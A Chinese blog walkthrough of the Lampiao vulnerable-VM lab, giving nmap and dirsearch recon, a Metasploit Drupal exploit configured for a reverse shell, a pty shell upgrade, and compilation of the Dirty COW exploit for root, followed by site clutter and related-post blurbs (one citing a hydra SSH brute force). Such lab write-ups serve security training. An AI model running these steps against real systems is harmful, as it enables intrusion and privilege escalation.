Lampiao靶场

最新推荐文章于 2024-07-23 15:42:50 发布

置顶仙322

最新推荐文章于 2024-07-23 15:42:50 发布

阅读量40

点赞数

分类专栏：渗透测试靶场文章标签：网络安全安全

本文链接：https://blog.csdn.net/weixin_61899124/article/details/131125924

版权

渗透测试靶场专栏收录该内容

6 篇文章 0 订阅

订阅专栏

信息收集

主机发现

arp-scan -l

端口扫描

nmap -p- 192.168.164.167

网页查看

访问http://192.168.164.167:1898/

最下方发现

目录扫描

dirsearch -u "http://192.168.164.167:1898/"

漏洞利用

msfconsole
search drupal
use 1
set rhosts 192.168.164.167
set rport 1898
set lhost 192.168.164.134
set lport 4444
run

提权

searchsploit dirty

上传漏洞源码

upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp

获取交互式shell

python -c "import pty; pty.spawn('/bin/bash')"

编译

g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

运行

./dcow -s

提权成功

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

仙322

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
Lampiao靶场

获取交互式shell。
复制链接

扫一扫

专栏目录

lampiao靶场

orchid_sea的博客

10-21

693

lampiao靶场

Lampiao靶场渗透流程

m0_53933413的博客

10-21

1030

use 4 使用可使用的载荷（tips：查询cms的时候，可以看到最新日期，所以选用最新日期之后的payload）查看是否有可以利用的东西，这里查到一个/CHANGELOG.txt进行访问。拿到更新日志，知道了CMS 具体版本号，及最后的更新日期。查看到80端口访问成功-尝试目录扫描-扫描不到。我这里搜到一个-远程代码执行漏洞-尝试利用-失败。查看文件的权限 ls -al 发现没有执行权限。查看文件权限，没有执行权的话，进行赋权操作。搜索该CMS是否存在漏洞，并进行利用，

1 条评论您还未登录，请先登录后发表或查看评论

lampiao靶场---脏牛提权

m0_66908617的博客

05-11

427

渗透测试前期准备攻击机：192.168.71.235（kali系统）靶机：192.168.71.191漏洞复现。

Lampiao靶场渗透

weixin_65582330的博客

06-05

301

这时候我们可以用得到的密码字典去拿hydra九头蛇进行ssh端口爆破，hydra -l tiago -P password.txt 192.168.101.133 ssh(“l”是用指定的用户名，“L”是用用户名字典，p和P同理)，可以看到爆破成功，账号为tiago，密码为Virgulino。1.内核提权---脏牛提权最为典型，内核提权一般包括3个步骤，信息收集发现版本号，找到相关版本的exp，使用找到的exp对目标发起攻击，完成提权功能。pty.spawn("/bin/bash")'获取到真终端。

lampiao靶场入侵检测

kunkun_xiaomeng的博客

09-10

972

lampiao初体验

Lampiao靶场实战-突破网络获取root权限

weixin_59086772的博客

08-30

528

雨笋教育小编分享近期我们渗透工程师在渗透过程中的一个真实案例，供大家可以参考学习。前言 Vulnhub是一个提供各种漏洞环境的靶场，每个镜像会有破解的目标，挑战的目标是通过网络闯入系统获取root权限和查看flag 说明难度：简单个人建议在vmware运行靶场环境，再使用kali作为攻击主机，同时要注意在同一网卡下，否则是无法进行通信的。开始进入技术环节这里我让kali和靶场都使用NAT模式编辑->虚拟网络编辑器可以看到我们使用模式的配置 Ip地址段都为19.

靶场练习之Lampiao

qq_52360932的博客

02-28

6001

Lampiao靶场练习

零基础打靶—Lampiao

qq_61861243的博客

08-28

516

1.确定目标：在所有的靶场中，确定目标就是使用nmap进行ip扫描，确定ip即为目标，其他实战中确定目标的方式包括nmap进行扫描，但不局限于这个nmap。2.常见的信息收集：比如平常挖洞使用fofa，天眼查，ip域名等进行查，在我们这次训练靶场中比如信息收集包括查看源码，使用工具dirb等3.发现漏洞：之前你们看到那些理论比如sql注入，文件上传等，或者找到相关的系统信息，去网上找相关的exp这些都是为了拿到webshell4.利用漏洞就是使用漏洞拿到webshell。

零基础渗透测试全程记录（打靶）——Lampiao

ran的博客

07-28

1837

权限提升，就是所谓的提权，因为一般进入拿到webshell后进入到服务器了都是低权限，在接下来的靶中我们的目标都是拿到root权限，所以拿到webshell后是低权限用户，这个时候我们需要一系列的方式进行提权，最后拿到root权限，即为结束。在上面扫描出的ip地址中，.1、.2、.254、.138都是其它的一些ip地址，所以在此确认要进行攻击的靶机的ip地址为：192.168.190.140。比如平常挖洞使用fofa，天眼查，ip域名等进行查，在我们这个靶场中比如信息收集包括查看源码，使用工具dirb等。

开源靶场zsbdzsbd

04-19

【开源靶场zsbdzsbd】是一个专注于网络安全的开源项目，其主要目的是为网络安全爱好者、学生和专业人士提供一个实践和学习网络安全技能的平台。在这个靶场中，你可以找到各种模拟真实网络环境中存在的漏洞，通过实战...

web渗透测试靶机（新手）

05-07

"626包厢"可能是一个虚拟机或靶场环境的名字，其中包含了多个Web应用程序，用于实践SQL注入、跨站脚本（XSS）、文件包含、命令注入等常见的渗透测试技术。这个环境可以帮助新手了解如何利用这些漏洞，并学习如何防止...

pikachu靶场环境

02-12

"pikachu靶场环境" 是一个专门为网络安全学习和实践设计的平台，它为用户提供了一个安全的、受控的环境来模拟真实的网络攻击与防御场景。在这个环境中，参与者可以学习和提升自己的渗透测试技巧，同时了解如何加固...

uploadlabs靶场文件

02-27

这个靶场可以帮助安全研究人员、开发人员以及网络安全爱好者了解和掌握如何预防和修复文件上传漏洞。【描述】：该靶场是基于PHPStudy的LAMP（Linux、Apache、MySQL、PHP）环境搭建的。"www"目录是Apache服务器默认...

webgoat靶场需要自行搭建

01-19

WebGoat是一个知名的在线安全靶场，主要用于网络安全教育和练习，尤其在Web应用程序安全领域具有重要地位。这个项目由OWASP（开放网络应用安全项目）维护，旨在帮助开发者、安全人员以及学生理解和学习常见的Web应用...

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8349

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

如何避免蓝屏？轻量部署，安全和业务连续性才能两不误

亚信安全官方账号的博客

07-23

641

轻量部署，安全和业务连续性才能两不误

深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞修复

TechEnthusiast的博客

07-23

238

Kubescape是一个开源的Kubernetes安全平台，由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修复Kubescape的优势在于其全面性和易用性。它不仅能够识别问题，还能提供修复建议，甚至在某些情况下自动进行修复。Kubescape作为一个全面的Kubernetes安全平台，其镜像修复功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修复流程，它大大降低了维护Kubernetes环境安全性的复杂度和工作量。

内网安全：IPC横向